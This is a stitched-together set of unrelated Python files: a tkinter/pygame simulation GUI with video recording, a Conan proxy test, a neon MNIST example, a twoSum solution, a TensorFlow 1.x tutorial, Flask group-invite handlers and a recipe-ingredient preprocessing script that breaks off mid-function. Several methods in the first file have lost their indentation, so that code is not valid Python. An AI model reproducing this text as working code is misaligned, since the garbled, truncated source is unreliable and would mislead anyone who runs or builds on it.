        # Starts at -1 so the later .set(0) fires observeur_nb_jours once.
        var_nb_jours = tkinter.IntVar(frame_new_moviepy, -1)
        button_sss = tkinter.Button(frame_new_moviepy,
                                    text=TK_VALIDER_BUTTON_TEXT,
                                    font=TK_BUTTON_FONT,
                                    command=command_button_sss)
        tk_fps_moviepy.trace_add("write", observeur_nb_jours)
        var_nb_jours.trace_add("write", observeur_nb_jours)
        # ----------------------------------------------------- image settings
        frame_images = new_label_frame(frame_new_moviepy, TK_LISTE_TITLE_MOVIEPY_FRAMES_TEXT[0], [1, 1, 1], [1, 1])
        tk_periode_image = tkinter.IntVar(frame_images, DIC_SCALE[SCALE_MOVIEPY_PERIODE][PARAM_DEFAULT_VALUE])
        tk_resolution = tkinter.IntVar(frame_images)
        liste_deroulante = ttk.Combobox(frame_images,
                                        values=liste_figures_matplotlib(),
                                        state="readonly",
                                        font=TK_LABEL_FONT)
        liste_deroulante.current(0)
        periode_scale = new_scale(frame_images, SCALE_MOVIEPY_PERIODE, tk_periode_image)
        frame_radiobuttons = new_label_frame(frame_images, TK_LISTE_TITLE_MOVIEPY_FRAMES_TEXT[1],
                                             [1] * len(LISTE_SIZE_ENREGISTREMENT), [1])
        liste_radiobuttons = []
        for type_size in LISTE_SIZE_ENREGISTREMENT:
            liste_radiobuttons.append(tkinter.Radiobutton(frame_radiobuttons,
                                                          text=DIC_SIZE_ENREGISTREMENT[type_size][PARAM_ENR_LABEL],
                                                          font=TK_LABEL_FONT,
                                                          value=type_size,
                                                          variable=tk_resolution))
        frame_miniature = new_label_frame(frame_images, TK_LISTE_TITLE_MOVIEPY_FRAMES_TEXT[2], [1, 1, 1], [1])
        tk_affiche_miniature = tkinter.BooleanVar(frame_miniature, True)
        cbname_observeur_miniature = tk_affiche_miniature.trace_add("write", observateur_affiche_miniature)
        check_button_miniature = tkinter.Checkbutton(frame_miniature,
                                                     text=TK_CHECKBUTTON_MOVIEPY_AFFICHER_MINIATURE,
                                                     font=TK_LABEL_FONT,
                                                     variable=tk_affiche_miniature)
        scale_size_miniature = \
            new_scale(frame_miniature, SCALE_MOVIEPY_SIZE_MINIATURE,
                      tkinter.DoubleVar(frame_miniature,
                                        value=DIC_SCALE[SCALE_MOVIEPY_SIZE_MINIATURE][PARAM_DEFAULT_VALUE]))
        scale_coef_froid = \
            new_scale_config(frame_miniature, COEF_AFFICHAGE_ENERGIE_DEPENSEE,
                             tkinter.DoubleVar(frame_miniature, value=DIC_CONFIGURATIONS[
                                 COEF_AFFICHAGE_ENERGIE_DEPENSEE][PARAM_DEFAULT_VALUE]))
        check_button_miniature.grid(row=0, column=0, pady=TK_MARGE_WIDGET, padx=TK_MARGE_WIDGET, sticky="nsw")
        scale_size_miniature.grid(row=1, column=0, padx=TK_MARGE_WIDGET, sticky="nsew")
        scale_coef_froid.grid(row=2, column=0, pady=TK_MARGE_WIDGET, padx=TK_MARGE_WIDGET, sticky="nsew")
        liste_deroulante.grid(row=0, column=0, pady=TK_MARGE_WIDGET, padx=TK_MARGE_WIDGET, sticky="sew")
        periode_scale.grid(row=2, column=0, columnspan=2, pady=TK_MARGE_WIDGET, padx=TK_MARGE_WIDGET, sticky="nsew")
        frame_radiobuttons.grid(row=1, column=0, padx=TK_MARGE_WIDGET, pady=TK_MARGE_WIDGET, sticky="nsew")
        for i, radiobutton in enumerate(liste_radiobuttons):
            radiobutton.grid(row=i, column=0, padx=TK_MARGE_WIDGET, sticky="nsw")
        frame_miniature.grid(row=0, column=1, rowspan=2, padx=TK_MARGE_WIDGET, sticky="nsew")
        tk_resolution.set(SIZE_ENREGISTREMENT_DEFAULT)
        # ----------------------------------------------------- video settings
        frame_videos = new_label_frame(frame_new_moviepy, TK_LISTE_TITLE_MOVIEPY_FRAMES_TEXT[3], [1] * 3, [1])
        label_nb_images = tkinter.Label(frame_videos,
                                        font=TK_LABEL_FONT)
        fps_scale = new_scale(frame_videos, SCALE_MOVIEPY_FPS, tk_fps_moviepy)
        label_duree = tkinter.Label(frame_videos,
                                    font=TK_LABEL_FONT)
        # Triggers observeur_nb_jours, which fills both labels.
        var_nb_jours.set(0)
        label_nb_images.grid(row=0, column=0, pady=TK_MARGE_WIDGET, padx=TK_MARGE_WIDGET, sticky="nsw")
        fps_scale.grid(row=1, column=0, pady=TK_MARGE_WIDGET, padx=TK_MARGE_WIDGET, sticky="nsew")
        label_duree.grid(row=2, column=0, pady=TK_MARGE_WIDGET, padx=TK_MARGE_WIDGET, sticky="nsw")
        # ----------------------------------------------------- bottom row
        check_button = tkinter.Checkbutton(frame_new_moviepy,
                                           text=TK_CHECKBUTTON_ENR_KEEP_IMAGES,
                                           font=TK_LABEL_FONT,
                                           variable=keep_images)
        button_annuler = tkinter.Button(frame_new_moviepy,
                                        text=TK_ANNULER_BUTTON_TEXT,
                                        font=TK_BUTTON_FONT,
                                        command=quitter)
        frame_images.grid(row=1, column=0, columnspan=2, pady=TK_MARGE_WIDGET, padx=TK_MARGE_WIDGET, sticky="nsew")
        frame_videos.grid(row=2, column=0, columnspan=2, pady=TK_MARGE_WIDGET, padx=TK_MARGE_WIDGET, sticky="nsew")
        check_button.grid(row=3, column=0, columnspan=2, pady=TK_MARGE_WIDGET, padx=TK_MARGE_WIDGET, sticky="nsw")
        button_sss.grid(row=4, column=1, pady=TK_MARGE_WIDGET, padx=TK_MARGE_WIDGET, sticky="nsew")
        button_annuler.grid(row=4, column=0, pady=TK_MARGE_WIDGET, padx=TK_MARGE_WIDGET, sticky="nsew")
def init_chemins_videos(self):
self.chemin_videos = f"{CHEMIN_SAUVEGARDE_VIDEO}"
if not os.path.exists(self.chemin_videos):
os.makedirs(self.chemin_videos)
while os.path.exists(self.chemin_videos):
self.num_simulation += 1
self.chemin_videos = f"{CHEMIN_SAUVEGARDE_VIDEO}/{SIMULATION_NOM_DOSSIER}{self.num_simulation}"
os.makedirs(self.chemin_videos)
def new_moviepy(self, id_fig: int, periode: int, var_nb_jours: tkinter.IntVar, type_resolution: int,
afficher_miniature, taille_miniature, coef_temperature_miniature):
if self.chemin_videos == "":
self.init_chemins_videos()
nom_dossier = f"{self.chemin_videos}/{FIGURE_NOM_DOSSIER}{id_fig}"
n = 1
while os.path.exists(nom_dossier) or os.path.exists(f"{os.path.exists(nom_dossier)}{FORMAT_VIDEOS}"):
n += 1
nom_dossier = f"{self.chemin_videos}/{FIGURE_NOM_DOSSIER}{id_fig}_{n}"
os.makedirs(nom_dossier)
return self.environnement.stats.new_enregistrement(id_fig, var_nb_jours, nom_dossier, periode, type_resolution,
afficher_miniature, taille_miniature,
coef_temperature_miniature)
def stop_moviepy(self, id_fig: int):
nom_dossier = self.environnement.stats.dic_figures_enregistrement[id_fig][PARAM_MATPLOTLIB_NOM_DOSSIER]
del self.environnement.stats.dic_id_figs[id_fig]
del self.environnement.stats.dic_figures_enregistrement[id_fig]
return nom_dossier
# Threading
    def new_environnement(self, dic_configurations: dict, dic_conf_caracteres: dict):
        """Background worker: build a fresh Environnement and install it.

        Shows the initialisation progress as a percentage on the START button;
        the build can be aborted via tk_var_stop_init_new_environnement
        (set by stop_simulation).
        """
        tk_var_stop_init_new_environnement = tkinter.BooleanVar(self.app, value=False)
        self.tk_var_stop_init_new_environnement = tk_var_stop_init_new_environnement
        # Abort any running recording before replacing the environment.
        self.stop_enregistrement.set(True)
        self.tk_buttons_simulation[START_BUTTON].config(text=TK_START_BUTTON_PLEASE_WAIT_TEXT, state="disabled")
        self.tk_buttons_simulation[STOP_BUTTON]["state"] = "normal"
        self.tk_buttons_pygame[NEW_BUTTON]["state"] = "disabled"
        # NOTE(review): uses START_BUTTON as the matplotlib button key while
        # new_matplotlib/stop_matplotlib use NEW_BUTTON -- confirm which key
        # tk_buttons_matplotbil actually contains.
        self.tk_buttons_matplotbil[START_BUTTON]["state"] = "disabled"

        def observateur_avancement(*_):
            # Mirror the init progress (0..1) as "NN %" on the START button.
            self.tk_buttons_simulation[START_BUTTON]["text"] = f"{int(100 * tk_var_avancement.get())} %"

        tk_var_avancement = tkinter.DoubleVar(self.app, value=0.)
        cbname_observeur_avancement = tk_var_avancement.trace_add("write", observateur_avancement)
        environnement = Environnement(dic_configurations, dic_conf_caracteres, tk_var_stop_init_new_environnement,
                                      tk_var_avancement)
        tk_var_avancement.trace_remove("write", cbname_observeur_avancement)
        # Clear the stop flag only if no newer init replaced ours meanwhile.
        # NOTE(review): `==` on tkinter Variables compares by variable name,
        # which behaves like identity here, but `is` would be clearer -- confirm.
        if self.tk_var_stop_init_new_environnement == tk_var_stop_init_new_environnement:
            self.tk_var_stop_init_new_environnement = None
        if environnement.init_terminee:
            # Install the new environment and reset recording/button state.
            self.environnement = environnement
            self.chemin_videos = ""
            self.stop_enregistrement.set(False)
            self.tk_buttons_simulation[START_BUTTON].config(text=TK_START_BUTTON_TEXT, state="normal")
            self.tk_buttons_simulation[STOP_BUTTON]["state"] = "disabled"
            self.tk_buttons_pygame[NEW_BUTTON]["state"] = "normal"
            self.tk_buttons_matplotbil[START_BUTTON]["state"] = "normal"
    def save_moviepy(self, emplacement_fichier_mp3, nom_dossier: str, fps: int, nb_images: int, keep_images: bool):
        """Assemble the recorded frame images of `nom_dossier` into a video file.

        emplacement_fichier_mp3: output path.  NOTE(review): the name says mp3
            but this receives the video path chosen in the save dialog.
        fps: frames per second of the resulting clip.
        nb_images: highest frame index to include (missing frames are skipped).
        keep_images: when False the source images are deleted after writing.
        """
        # Modal "saving..." window; the close button is neutralised during the
        # write so the user cannot interrupt it.
        frame_saving = new_top_frame(self.app, TK_MOVIEPY_ENREGISTREMENT_FRAME_SIZE, TK_CAPTION_TEXT,
                                     TK_TITLE_MOVIEPY_ENREGISTREMENT_TEXT, [1, 1], [1])
        text = tkinter.Label(frame_saving,
                             text=emplacement_fichier_mp3,
                             font=TK_LABEL_FONT)
        text.grid(row=1, column=0, pady=TK_MARGE_WIDGET, padx=TK_MARGE_WIDGET, sticky="nsew")
        frame_saving.protocol("WM_DELETE_WINDOW", lambda *_: None)
        # os.remove(emplacement_fichier_mp3)
        clip = Movieclip.ImageSequenceClip([f"{nom_dossier}/{i}{FORMAT_IMAGES}" for i in range(1, nb_images + 1)
                                            if os.path.exists(f"{nom_dossier}/{i}{FORMAT_IMAGES}")],
                                           fps=fps)
        clip.write_videofile(emplacement_fichier_mp3, verbose=False, logger=None, audio=False)
        if not keep_images:
            clear_images_moviepy(nom_dossier, nb_images)
        frame_saving.destroy()
def run_simulation(self):
while self.running_simu:
self.environnement.update()
time.sleep(self.delay_simulation.get())
def run_affichage_pygame(self, dic_configurations):
pygame.init()
pygame.display.set_caption(CAPTION)
if dic_configurations[PLEIN_ECRAN]:
screen = pygame.display.set_mode((dic_configurations[LARGEUR_ECRAN],
dic_configurations[HAUTEUR_ECRAN]), pygame.FULLSCREEN)
else:
screen = pygame.display.set_mode((dic_configurations[LARGEUR_ECRAN],
dic_configurations[HAUTEUR_ECRAN]))
self.environnement.init_pygame(dic_configurations)
while self.running_pygame:
for event in pygame.event.get():
if event.type == pygame.QUIT:
self.stop_pygame()
break
elif event.type == pygame.MOUSEBUTTONDOWN:
if event.button == 1:
self.environnement.gere_clic(*pygame.mouse.get_pos())
elif event.button == 4:
self.environnement.gere_zoom(True, *pygame.mouse.get_pos())
elif event.button == 5:
self.environnement.gere_zoom(False, *pygame.mouse.get_pos())
elif event.type == pygame.MOUSEMOTION:
self.environnement.gere_deplacement_souris(*pygame.mouse.get_pos())
elif event.type == pygame.KEYDOWN:
if event.key == pygame.K_ESCAPE:
self.stop_pygame()
break
try:
self.environnement.affiche(screen)
except:
print("Oups !")
pygame.display.update()
pygame.time.Clock().tick(self.var_fps_pygame.get())
self.environnement.carte.ecran = None
pygame.quit()
return
    def run_graphs_matplotlib(self, garph: bool, caractere_3D: list = None, vitesse_rotate=None, hauteur_z=None):
        """Matplotlib worker loop driving one figure.

        garph: True -> population graph, False -> 3D trait graph.
            (NOTE(review): parameter name is a typo for "graph"; kept because
            it is part of the method's visible signature.)
        caractere_3D: the three traits used as 3D axes (forced to None for the
            population graph).
        vitesse_rotate / hauteur_z: rotation speed and z elevation of the 3D view.
        """
        if garph:
            caractere_3D = None
        plt.ion()
        id_fig = self.environnement.stats.init_graph_matplotlib(caractere_3D, vitesse_rotate, hauteur_z)
        self.list_id_figs_matplotlib.append(id_fig)
        self.tk_nb_figs_matplotlib.set(self.tk_nb_figs_matplotlib.get() + 1)
        while self.running_matplotbil:
            self.environnement.stats.update_graph_matplotlib(id_fig)
            self.environnement.stats.dic_id_figs[id_fig][PARAM_MATPLOTLIB_FIG].canvas.draw_idle()
            try:
                self.environnement.stats.dic_id_figs[id_fig][PARAM_MATPLOTLIB_FIG].canvas.flush_events()
            except tkinter.TclError:
                # The figure window was closed by the user; stop the whole
                # matplotlib loop if this was the last remaining figure.
                if len(self.list_id_figs_matplotlib) == 1:
                    self.stop_matplotlib()
                break
            time.sleep(1 / self.var_fps_matplotlib.get())
        plt.close(id_fig)
        # Not clean at all, but it works... (translated from the original French)
        try:
            self.environnement.stats.dic_id_figs[id_fig][PARAM_MATPLOTLIB_FIG].canvas.draw_idle()
            self.environnement.stats.dic_id_figs[id_fig][PARAM_MATPLOTLIB_FIG].canvas.flush_events()
        except tkinter.TclError:
            pass  # This should always raise and thereby stop whatever Matplotlib is doing... (translated)
        del self.environnement.stats.dic_id_figs[id_fig]
        self.list_id_figs_matplotlib.remove(id_fig)
        self.tk_nb_figs_matplotlib.set(self.tk_nb_figs_matplotlib.get() - 1)
        return
|
import unittest
import os
from conans.test.utils.tools import TestClient
from conans.util.files import save
from conans.client.conan_api import get_basic_requester
class ProxiesConfTest(unittest.TestCase):
    """Check that [proxies] entries from conan.conf are mapped onto the
    requester's proxies dict and that no_proxy is exported as NO_PROXY."""

    def setUp(self):
        # Snapshot the environment so variables set while building the
        # requester (e.g. NO_PROXY) can be rolled back in tearDown.
        self.old_env = dict(os.environ)

    def tearDown(self):
        os.environ.clear()
        os.environ.update(self.old_env)

    def test_requester(self):
        client = TestClient(default_profile=False)
        conf = """
[proxies]
https=None
no_proxy=http://someurl,http://otherurl.com
http=http:/conan.url
"""
        save(client.client_cache.conan_conf_path, conf)
        requester = get_basic_requester(client.client_cache)
        # "https=None" must survive as a literal None entry; no_proxy must NOT
        # appear in the proxies dict (it goes to the environment instead).
        self.assertEqual(requester.proxies, {"https": None,
                                             "http": "http:/conan.url"})
        self.assertEqual(os.environ["NO_PROXY"], "http://someurl,http://otherurl.com")
|
# ----------------------------------------------------------------------------
# Copyright 2015 Nervana Systems Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ----------------------------------------------------------------------------
"""
Example that creates and uses a network without a configuration file.
"""
import logging
from neon.backends import gen_backend
from neon.layers import FCLayer, DataLayer, CostLayer
from neon.models import MLP
from neon.transforms import RectLin, Logistic, CrossEntropy
from neon.datasets import MNIST
from neon.experiments import FitPredictErrorExperiment
# Root-logger setup: level 20 == logging.INFO.
logging.basicConfig(level=20)
logger = logging.getLogger()
def create_model(nin):
    """Build a small MLP classifier for `nin` input features: 100 RectLin
    hidden units, 10 Logistic outputs, cross-entropy cost."""
    stack = [
        DataLayer(nout=nin),
        FCLayer(nout=100, activation=RectLin()),
        FCLayer(nout=10, activation=Logistic()),
        CostLayer(cost=CrossEntropy()),
    ]
    return MLP(num_epochs=10, batch_size=128, layers=stack)
def run():
    """Train the MLP on MNIST and report fit/predict error."""
    model = create_model(nin=784)
    backend = gen_backend(rng_seed=0)
    dataset = MNIST(repo_path='~/data/')
    FitPredictErrorExperiment(model=model,
                              backend=backend,
                              dataset=dataset).run()
if __name__ == '__main__':
    # Entry point when executed as a script.
    run()
|
class Solution:
    def twoSum(self, num, target):
        """Return indices (i, j), i < j, of the two entries of `num` summing to
        `target`, or None when no such pair exists.

        Single pass, O(n): `seen` maps the complement still needed to the index
        of the element waiting for it, so each element is one dict lookup.
        (Fixes from the original: the dict no longer shadows the builtin `map`,
        and range(len(...)) is replaced by enumerate.)
        """
        seen = {}  # complement value -> index of the element that needs it
        for i, value in enumerate(num):
            if value in seen:
                return seen[value], i
            # Register only when `value` is not itself a pending complement,
            # matching the original's `not in` guard (duplicates like [3, 3]
            # are matched by the branch above instead).
            seen[target - value] = i
        return None
# Demonstration on the three classic example inputs.
examples = [
    [[2, 7, 11, 15], 9],
    [[3, 2, 4], 6],
    [[3, 3], 6]
]
for nums, target in examples:
    print(Solution().twoSum(nums, target))
import tensorflow as tf
# TensorFlow 1.x basics: constants, placeholders, variables and simple ops,
# all evaluated through a Session (graph mode).
hello_world = tf.constant('Hello World!', dtype=tf.string)  # constant tensor
print(hello_world)  # hello_world is a Tensor here: the symbolic output of an op
# out: Tensor("Const:0", shape=(), dtype=string)
hello = tf.placeholder(dtype=tf.string, shape=[None])  # placeholder tensor, assigned at sess.run time via feed_dict
world = tf.placeholder(dtype=tf.string, shape=[None])
hello_world2 = hello+world  # addition-op tensor -- NOTE(review): a "print(hello_world2)" call was fused into this comment in the original source
# out: Tensor("add:0", shape=(?,), dtype=string)
# math
x = tf.Variable([1.0, 2.0])  # variable tensor: mutable state
y = tf.constant([3.0, 3.0])
mul = tf.multiply(x, y)  # element-wise multiplication tensor
# logical
rgb = tf.constant([[[255], [0], [126]]], dtype=tf.float32)
logical = tf.logical_or(tf.greater(rgb,250.), tf.less(rgb, 5.))  # positions in rgb where >250 or <5 become True, others False
where = tf.where(logical, tf.fill(tf.shape(rgb),1.), tf.fill(tf.shape(rgb),5.))  # True positions get 1, False positions get 5
# Launch the default graph.
# sess = tf.Session()
with tf.Session() as sess:
    sess.run(tf.global_variables_initializer())  # initialise variables
    result = sess.run(hello_world)  # Fetch: obtain the tensor's computed value
    print(result, result.decode(), hello_world.eval())  # `t.eval()` is a shortcut for calling `tf.get_default_session().run(t)`.
    # out: b'Hello World!' Hello World! b'Hello World!'  -- the 'b' prefix marks a bytestring; decode() turns it into str
    print(sess.run(hello, feed_dict={hello: ['Hello']}))
    # out: ['Hello']
    print(sess.run(hello_world2, feed_dict={hello: ['Hello'], world: [' World!']}))  # Feed: assign placeholder values
    # out: [b'Hello World!']
    print(sess.run(mul))
    # out: [ 3.  6.]
    print(sess.run(logical))
    # out: [[[ True] [ True] [False]]]  -- NOTE(review): a "print(sess.run(where))" call was fused into this comment in the original, so `where` is never actually printed
    # out: [[[ 1.] [ 1.] [ 5.]]]  -- True positions were given 1, False positions 5
    # sess.close()  # needed only when sess is not created via `with`
|
import os
import sys
sys.path.append(os.getenv('cf'))
import datetime
from cartoforum_api.orm_classes import sess
from flask import session, render_template, request, jsonify
from cartoforum_api.orm_classes import GroupRequests, Group, Users, UsersGroups, InviteMe
from cartoforum_api.core import cur, pgconnect
# @cfapp.route('/invite_user', methods=['GET'])
def invite_user():
    """Invite a user (looked up by username) to the current session's group.

    Returns a JSON response naming the outcome: unknown user, duplicate
    invite, user already a member, or invite sent.
    """
    invitee = request.args.get('invitee', type=str)
    try:
        inviteeuserid = sess.query(Users).filter_by(username=invitee).one().userid
    except Exception:  # .one() raises when no (or multiple) rows match; never use a bare except
        return jsonify(response="user doesn't exist")
    # Reject duplicate invites for the same user/group pair.
    inviteexists = sess.query(GroupRequests).filter_by(invitee=inviteeuserid).\
        filter_by(groupid=session['groupid']).count()
    if inviteexists > 0:
        return jsonify(response='invite already exists')
    # Reject invites to users who already belong to the group.
    useringroup = sess.query(UsersGroups).filter_by(groupid=session['groupid']).filter_by(userid=inviteeuserid).count()
    if useringroup > 0:
        return jsonify(response='user already in group')
    newinvite = GroupRequests(requester=session['userid'], invitee=inviteeuserid, groupid=session['groupid'],
                              dateissued=datetime.datetime.utcnow(), complete='f')
    sess.add(newinvite)
    sess.commit()
    return jsonify(response='invite sent')
def get_user_invites(userid):
    """Collect pending invites and join requests for *userid*.

    Returns a dict with two lists:
      'requests' - pending GroupRequests inviting this user to a group
      'invites'  - pending InviteMe rows asking to join a group this user owns
    """
    invreq = {'invites': [], 'requests': []}
    for gr, g, u in sess.query(GroupRequests, Group, Users).filter_by(invitee=userid).\
            filter_by(complete='f').join(Group).join(Users):
        invreq['requests'].append({"requestid": gr.requestid, "requester": u.username, "group": g.groupname,
                                   "date": gr.dateissued})
    # Parameterized query: never interpolate values into SQL with .format()
    # (the original was injectable and also fetched with a format string).
    cur.execute("SELECT inviteme.requestid, users.username, groups.groupname, inviteme.date "
                "FROM inviteme INNER JOIN users ON users.userid = inviteme.userid "
                "JOIN groups ON groups.groupid = inviteme.groupid "
                "WHERE accepted is null AND groups.userid = %s", (userid,))
    for row in cur.fetchall():
        # row[2] is the group name; the original appended the literal list [2] here.
        invreq['invites'].append({"requestid": row[0], "requester": row[1], "group": row[2], "date": row[3]})
    pgconnect.commit()
    return invreq
# @cfapp.route('/manageRequest', methods=['POST'])
def manage_request():
    """Handle an accept/decline form post for a pending group request.

    On 'accept' the invitee is added to the group; either way the request
    is marked complete.
    """
    requestid = request.form['requestid']
    action = request.form['submit']
    # Parameterized queries: requestid comes straight from the client,
    # so it must never be spliced into SQL with .format().
    cur.execute("SELECT groupid,invitee FROM grouprequests WHERE requestid = %s;", (requestid,))
    for row in cur.fetchall():
        if action == 'accept':
            # make sure it doesn't add twice
            cur.execute("INSERT INTO usersgroups VALUES (%s,%s)", (row[1], row[0]))
        # Mark the request handled regardless of accept/decline.
        cur.execute("UPDATE grouprequests set complete = 't' WHERE requestid = %s", (requestid,))
    pgconnect.commit()
    return render_template('groupselect.html')
# @cfapp.route('/manageInvite', methods=['POST'])
def accept_invite():
    """Handle an accept/decline form post for a pending InviteMe join request.

    On 'accept' the requesting user is added to the group; either way the
    row is marked accepted.
    """
    requestid = request.form['requestid']
    action = request.form['submit']
    # Parameterized queries: requestid is client-supplied input.
    cur.execute("SELECT groupid,userid FROM inviteme WHERE requestid = %s;", (requestid,))
    for row in cur.fetchall():
        if action == 'accept':
            # make sure it doesn't add twice
            cur.execute("INSERT INTO usersgroups VALUES (%s,%s)", (row[1], row[0]))
        cur.execute("UPDATE inviteme set accepted = 't' WHERE requestid = %s", (requestid,))
    pgconnect.commit()
    return render_template('groupselect.html')
# @cfapp.route('/request_invite', methods=['POST'])
def request_invite():
    """File a join request (InviteMe row) for the posted group id on behalf of the logged-in user."""
    group_id = request.form['gid']
    join_request = InviteMe(userid=session['userid'], groupid=group_id,
                            date=datetime.datetime.utcnow())
    sess.add(join_request)
    sess.commit()
    return render_template("discovery.html", invite="sent")
|
import json
import gzip
from pprint import pprint
from sets import Set
from collections import Counter, defaultdict
import matplotlib.pyplot as plt
import re
import numpy as np
from sklearn.feature_extraction import DictVectorizer
import sys
import pickle
import copy
from random import shuffle
class Recipe(object):
    """A single recipe: an id, an optional cuisine label, and its ingredient list."""

    def __init__(self, uid=None, cuisine=None, ingredients=None):
        self.uid = uid
        self.cuisine = cuisine
        # The original default (ingredients=[]) is a mutable default argument,
        # shared across every instance created without the parameter.
        self.ingredients = [] if ingredients is None else ingredients

    def get_int_ingredients(self, feature_dict):
        """Map each ingredient name to its integer feature id via *feature_dict*."""
        # array returned will be formatted as follows:
        # [ingredient0, ingredient1 ... ingredientn]
        return [feature_dict[ingredient] for ingredient in self.ingredients]

    def get_int_cuisine(self, cuisine_dict):
        """Map the cuisine name to its integer class label via *cuisine_dict*."""
        return cuisine_dict[self.cuisine]
# will used to remove certain words in order to reduce feature space
# NOTE: the original list was missing a comma between "crystal farms" and
# "reduced fat", which implicitly concatenated them into the single bogus
# entry "crystal farmsreduced fat"; both entries are restored here.
black_list = ["whole", "fat", "reduced", "low", "crushed", "fine", "fresh",
              "ground", "less", "chopped", "nonfat", "lowfat", "large", "grated", "sodium", "lowsodium", "free", "lean", "no", "solid", "cooking", "tips", "kraft", "fresh", "frozen", "chopped", "oz", "boneless", "skinless", "tastethai", "barilla", "bertolli", "bestfoods", "campbells", "lowfat", "crisco pure", "crystal farms", "reduced fat", "delallo", "domino", "heinz", "herdez", "hiddenvalleyoriginal", "johnsonville", "and", "fat free", "reducedsodium", "lowsodium", "lowersodium"]
def intersect(a, b):
    """Return the elements common to *a* and *b* (as a list, order unspecified)."""
    common = set(a)
    common &= set(b)
    return list(common)
def remove_words(words=None, black_list=None):
    """Strip every black-listed token out of each word; drop words that become empty.

    Fixes two defects in the original:
    - mutable default arguments ([] shared across calls);
    - words containing no black-listed token were silently dropped (the
      append was nested inside ``if overlap``), losing most of the data.
    """
    words = [] if words is None else words
    banned = set() if black_list is None else set(black_list)
    new_list = []
    for word in words:
        # Tokens of this word that appear on the black list.
        overlap = set(word.lower().split(" ")) & banned
        for term in overlap:
            word = word.replace(term, "")
        if word:
            new_list.append(word)
    return new_list
def clean(words=None):
    """Lower-case each word, replacing every non-letter with a space, then strip.

    The original used a mutable default argument (words=[]); use None instead.
    """
    if words is None:
        words = []
    clean_list = []
    # Remove everything that's not a letter or space
    for word in words:
        clean_word = re.sub(r"[^a-zA-Z]", " ", word)
        clean_list.append(clean_word.lower().strip())
    return clean_list
def graph(dict_to_graph={}):
    """Render *dict_to_graph* as a horizontal bar chart, one labelled bar per key."""
    positions = range(len(dict_to_graph))
    plt.barh(positions, dict_to_graph.values(), align='center')
    plt.yticks(positions, dict_to_graph.keys())
    plt.show()
def reduce_to_single_word(words=None):
    """Split every multi-word entry and return the Set of individual lower-case tokens.

    The original used a mutable default argument (words=[]); use None instead.
    Keeps the py2 `sets.Set` type for consistency with the rest of this module.
    """
    if words is None:
        words = []
    new_set = Set()
    for word in words:
        for w in word.lower().split(" "):
            if w:  # skip empty tokens produced by double spaces
                new_set.add(w)
    return new_set
# main starts here
def main():
    """Load the train/test recipe JSON, normalize ingredient text, one-hot
    encode each recipe's ingredients with DictVectorizer, and save the
    resulting matrices as .npy files for the neural-net trainer.
    """
    recipes = []
    recipes_test = []
    # If true uses blacklist to remove words
    REMOVE_WORDS = True
    REDUCE_TO_SINGLE = True
    CLEAN = True
    GET_UNIFORM = False
    #artifically inflate data size by using duplicate data
    GET_DUPLICATE = False
    # Multiplied the the class count of the class with the least number of
    # occurances.
    NUMBER_OF_SAMPLES_PER_CLASS = 1000
    features = []
    classes = []
    # used to count occurances of each ingrediant and cuisine type
    feature_cnt = Counter()
    class_cnt = Counter()
    feature_map = {}
    class_map = {}
    class_total_cnt = Counter()
    # Labelled training recipes: collect ids, cuisine labels, and ingredients.
    with open('train.json') as f:
        recipes_json = json.loads(f.read())
        for recipe in recipes_json:
            uid = int(recipe['id'])
            cuisine = str(recipe['cuisine']).strip()
            classes.append(cuisine)
            features += recipe['ingredients']
            recipes.append(Recipe(uid, cuisine, recipe['ingredients']))
    # Unlabelled test recipes (no cuisine field).
    with open('test.json') as f:
        recipes_json = json.loads(f.read())
        for recipe in recipes_json:
            uid = int(recipe['id'])
            features += recipe['ingredients']
            recipes_test.append(
                Recipe(uid=uid, ingredients=recipe['ingredients']))
    print "Total number of samples: %d" % len(recipes)
    print "Total number of test samples %d" % len(recipes_test)
    # the recipes are shuffled each time. This way we can get different
    # training subsets from the larager data set
    shuffle(recipes)
    # Assign each distinct cuisine an integer class label.
    label = 0
    for c in Set(classes):
        class_map[c] = label
        label += 1
    print class_map
    # clean recipes
    if CLEAN:
        features = clean(features)
        for recipe in recipes:
            recipe.ingredients = clean(recipe.ingredients)
        for recipe in recipes_test:
            recipe.ingredients = clean(recipe.ingredients)
    # Break multi-word ingredients into single-word tokens.
    if REDUCE_TO_SINGLE:
        print "Reducing to single"
        features = Set(reduce_to_single_word(features))
        for recipe in recipes:
            recipe.ingredients = Set(reduce_to_single_word(recipe.ingredients))
        for recipe in recipes_test:
            recipe.ingredients = Set(reduce_to_single_word(recipe.ingredients))
    # Strip black-listed filler words (brands, sizes, preparation terms).
    if REMOVE_WORDS:
        print "Removing words"
        features = Set(remove_words(features, black_list))
        for recipe in recipes:
            recipe.ingredients = Set(
                remove_words(recipe.ingredients, black_list))
        for recipe in recipes_test:
            recipe.ingredients = Set(
                remove_words(recipe.ingredients, black_list))
    # Optionally re-balance the classes by capping (and, with GET_DUPLICATE,
    # duplicating) samples per cuisine.
    if GET_UNIFORM:
        bins = defaultdict(list)
        for recipe in recipes:
            bins[class_map[recipe.cuisine]].append(recipe)
        recipes = []
        for key in bins.keys():
            class_count = len(bins[key])
            while GET_DUPLICATE and (class_count < NUMBER_OF_SAMPLES_PER_CLASS):
                print "Adding [%d] more recipes to [%s]" % (class_count, key)
                bins[key] += copy.copy(bins[key])
                class_count = len(bins[key])
            # print len(bins[key])
            # for i in range(len(bins[key]) % NUMBER_OF_SAMPLES_PER_CLASS):
            recipes = recipes + bins[key][:NUMBER_OF_SAMPLES_PER_CLASS]
    # print recipes[0]
    shuffle(recipes)
    print "Numober of train samples %d" % len(recipes)
    print "Numober of test samples %d" % len(recipes_test)
    # Build one {ingredient: ingredient} dict per recipe for DictVectorizer,
    # which one-hot encodes the presence of each ingredient token.
    feature_map = []
    y_train = []
    labels = []
    for recipe in recipes:
        ing_d = dict()
        labels.append(recipe.uid)
        y_train.append(class_map[recipe.cuisine])
        for ingredient in recipe.ingredients:
            ing_d[ingredient] = ingredient
        feature_map.append(ing_d)
    labels_test = []
    feature_map_test = []
    for recipe in recipes_test:
        ing_d = dict()
        labels_test.append(recipe.uid)
        for ingredient in recipe.ingredients:
            ing_d[ingredient] = ingredient
        feature_map_test.append(ing_d)
